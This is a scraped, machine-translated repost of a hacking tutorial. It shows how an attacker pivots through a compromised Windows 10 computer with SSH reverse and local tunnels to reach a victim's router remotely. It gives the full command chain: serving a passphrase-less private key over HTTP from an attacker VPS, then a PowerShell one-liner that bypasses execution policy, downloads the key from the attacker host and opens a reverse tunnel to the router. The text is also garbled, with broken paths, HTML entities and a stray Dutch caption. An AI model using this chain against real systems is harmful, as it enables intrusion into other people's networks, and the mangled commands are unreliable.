قالب وردپرس درنا توس
Home / Tips and Tricks / Using SSH Tunnels to Forward Requests and Hack External Routers «Null Byte :: WonderHowTo

Using SSH Tunnels to Forward Requests and Hack External Routers «Null Byte :: WonderHowTo



Without administrator privileges, installing additional software, or changing the Windows 10 firewall, an attacker can change a router and perform different types of exploits. It is accomplished by forwarding requests from Kali through a back door Windows computer to the router gateway with simple SSH tunnels.

The attack that I will outline benefits from the SSH -R and -L port forwarding options to make encrypted connections to and from the attacker's server. The diagram below provides a simplified representation of the attack.

  # Attack Topology

[Kali/Hacker]
|
|
SSH
|
 | /
& # 39;
[Debian/Server]
.
/ | 
|
SSH + -> [Raspberry Pi on 1
92.168.1.2:8080] | / | / [Windows 10/Proxy] ----> [Router/Target on 192.168.1.1:80] + -> [Torrent Client on 192.168.1.3:8080]

The connections allow the attacker to forward requests through a virtual private server (Debian) and then through a compromised Windows 10 PC, ultimately allowing the attacker access to the router gateway. Other devices and ports on the network can be targeted through the Windows 10 computer, but we'll focus on the router. An attacker who has access to router settings can do all kinds of damage.

The PowerShell payload runs in Windows 10, which requires it to make an SSH connection to the attacker's server. That link forwards requests from the server through Windows 10 to the router gateway. To access the forwarding port in the Debian VPS, the attacker also connects to the server, allowing it to use this and Windows 10 as a dual forwarding mechanism.

Similar attacks can be performed with Tor that allow better access to devices and ports on the target network. But I wanted to come up with a forwarding solution that didn't include administrator rights, third party software, opening ports in Windows 10 or changing firewalls.

The environment can be set up with Kali Linux and Windows 10 on a shared Wi-Fi network. In such scenarios, the attacker may attempt to access a service using the Windows 10 IP address to bypass IP filtering or whitelisting. However, that is a specific and less practical case. For that reason, our demonstration will use a virtual private server, allowing an attacker to hack the router remotely through two systems from any network in the world.

Step 1: Configure the Debian Server

First of all, SSH in the virtual private server used as root in the attack. The server IP address is shown as 11.22.33.44 in the rest of this tutorial.

Create a new SSH key pair with the following ssh-keygen command. If prompted for a password, leave it blank and press Enter on the keyboard. The key pair passphrase must be empty for the attack to work.

By default, the ssh-keygen prompt will try to name the new keys "id_rsa". Change it to any string like "ab56ab49226ed8603e9ae41e242d8096" to thwart potential directory crawlers.

Warning: The file name "key" will be used for the rest of this demonstration for simplicity, but it is generally not a good practice. Web crawlers that can list the "key" file have full remote access to the Debian server.

  ~ # ssh-keygen

Generating a public / private RSA key pair.
Enter the file in which to store the key (/root/.ssh/id_rsa): /root/.ssh/key
Directory & # 39; /root/.ssh' made.
Enter passphrase (empty for no passphrase):
Enter the same passphrase again:
Your identification is stored in /root/.ssh/key.
Your public key is stored in /root/.ssh/key.pub.
The main fingerprint is:
SHA256: 5M9KVJVlW2o2er4MSaW0 + 5yyFhqhKm51kAfrt / fEnbA root @ debian9
The randomart image of the key is:
+ --- [RSA 2048] ---- +
| .oo. |
| . ... + |
| +. . . B |
| + o .... B. |
| . oS. . *. |
| o. + o.o.O. |
| . + .. ooE. + |
| o .... o.o = o |
| o .. .. ooo * |
+ ---- [SHA256] ----- + 

Then go to the ~ / .ssh folder.

  ~ # cd ~ / .ssh 

View the files in the folder; there must be a public (.pub) and a private key.

  ~ / .ssh # ls -la

-rw ------- 1 root root 1675 March 24 05:26 key
-rw-r - r-- 1 root root 391 March 24 05:26 key.pub 

Copy the public key to a file named "authorized_keys". That gives any SSH client (ie Windows 10) with the private key the ability to authenticate to the SSH server.

  ~ / .ssh # cp key.pub authorizedkeys 

Modify the "sshd_config" file to disable password authentication. Only clients with the private key can authenticate with the server after the change. It is an essential step because password authentication can prevent the hacked Windows client from being properly verified.

  ~ / .ssh # nano / etc / ssh / sshd_config 

Set the "PasswordAuthentication" option to "no" and remove the line if necessary. Save and exit nano by pressing Ctrl + x then y and Enter .

Now reboot the SSH server with the command systemctl .

  ~ / .ssh # systemctl restart ssh 

In the .ssh / directory, create a blank "index.html" file to prevent the following HTTP server from saving the files in the directory.

  ~ / .ssh # touch index.html 

Make the keys available for the internet with the following screen commands and python3 . Screen allows the Python3 HTTP server to persist long after the SSH connection is lost.

  ~ / .ssh # screen python3 -m http.server 80

Control HTTP on 0.0.0.0 port 80 ... 

To disconnect from the screen session without ending the Python3 server, press Control-A and then D . Then close the SSH session.

Step 2: Test the SSH service

To ensure that the SSH server is configured correctly, a few things can be done.

Open Firefox on a local Kali machine. and navigate to the server's IP address or domain name. The server is displaying a blank page because of the empty index.html file created in the previous step. Download the / key from the URL bar. <19659035 · Hacking Windows 10: SSH-tunnels gebruiken om verzoeken door te sturen en externe routers te hacken " width="480" height="480" style="max-width:532px;height:auto;"/>

The ability to download the key means that PowerShell can also find it when Invoke-WebRequest is running on the target Windows computer.

Then open a terminal and copy the key to Kali's ~ / .ssh / directory.

  ~ # cp ~ / Downloads / key ~ / .ssh / 

The SSH client in Kali is special about the file permissions of the key. Change the permissions with the chmod command.

  ~ # chmod 0600 ~ / .ssh / key 

Finally, test the key by authenticating to Kali's Debian server. If the Debian server asks for a password or refuses the key, something has gone wrong. Kali should be able to authenticate with the server without being prompted.

  ~ # ssh -o StrictHostKeyChecking = no -i ~ / .ssh / key root@11.22.33.44

Warning: Permanently added & # 39; [11.22.33.44]: 22, [XX.XXX.XXX.XX]: 22 & # 39; (ECDSA) to the list of known hosts.
Linux debian9 4.9.0-9-amd64 # 1 SMP Debian 4.9.168-1 + deb9u2 (2020-03-24) x86_64

Debian GNU / Linux is ABSOLUTELY NO WARRANTY provided as necessary
permitted by applicable law.

root @ debian9: ~ # 

Step 3: Run the payload

The PowerShell payload can run against Windows 10 in several ways on It is useful during post-exploitation attacks where remote access to the computer has already been established. Mousejack and USB Rubber Ducky & # 39; s payloads are always very effective, but it can be converted into an executable (EXE) file and sent with the target.

  C: > powershell -ep bypass / w 1 / C iwr 11.22.33.44/key -OutFile $ env: temp  key; ssh -N -i $ env: temp  key -R 9999: 192.168.1.1: 80 -o StrictHostKeyChecking = no root@11.22.33.44 -p 22 

PowerShell will first call the Command-WebRequest to get the key / download from the attacker's server and store it in the temporary folder. SSH is then called with the option -R which forwards requests to port 9999 via the Windows computer and to the router's IP address 192.168.1.1:80.

Step 4: Configuring Kali to Access the Router Gateway

After executing the payload, use netstat on the Debian server to discover that port 9999 is open.

  ~ # netstat -lptn

Active internet connections (servers only)
Proto Recv-Q Send-Q Local address Foreign address State PID / program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1220 / sshd
tcp 0 0 127.0.0.1:9999 0.0.0.0:* LISTEN 9999 / sshd: root @ pts
tcp6 0 0 ::: 22 ::: * LISTEN 1220 / sshd
tcp6 0 0 :: 1: 9999 

Requests sent to port 9999 are now forwarded to the router (192.168.1.1:80). The problem is that port 9999 is only available on Debian's loopback address (127.0.0.1) – which cannot be accessed from external IP addresses (i.e. Kali). One solution is to go to the Debian server from Kali with the option -L .

  ~ # ssh -N -L 8888: 127.0.0.1: 9999 -i ~ / .ssh / key root @ 11.22.33.44 

In Kali, requests to port 8888 are forwarded to port 9999 on the Debian server. The requests are then immediately forwarded through Windows 10 and eventually to the router gateway. Both Debian and Windows 10 work together as forwarding systems that allow the attacker to access the router in another part of the world.

It can be verified by opening Firefox in Kali and navigating to http: //127.0. 0.1: 8888 .

Router gateway accessible through Windows 10.

Final Thoughts …

The attack is a bit on the complicated side because it involves two degrees of port forwarding. However, it shows how hackers try to access other devices and ports on the target network remotely without any special privileges or additional software. If there are more simple methods to achieve the same goal, leave a comment below; I would love to hear about it.

If you liked this article, follow me on Twitter @tokyoneon_ and GitHub to stay with my current projects. For questions and comments, you can leave a comment or send me a message on Twitter.

Don't miss: Stealing and decrypting passwords stored remotely in Chrome and Firefox

—–
Learn to code with Null Byte's beginners course Python.

Buy now for $ 99.99>

Cover photo by Kevin Horvat / Unsplash; Screenshots and GIF by tokyoneon / Null Byte




Source link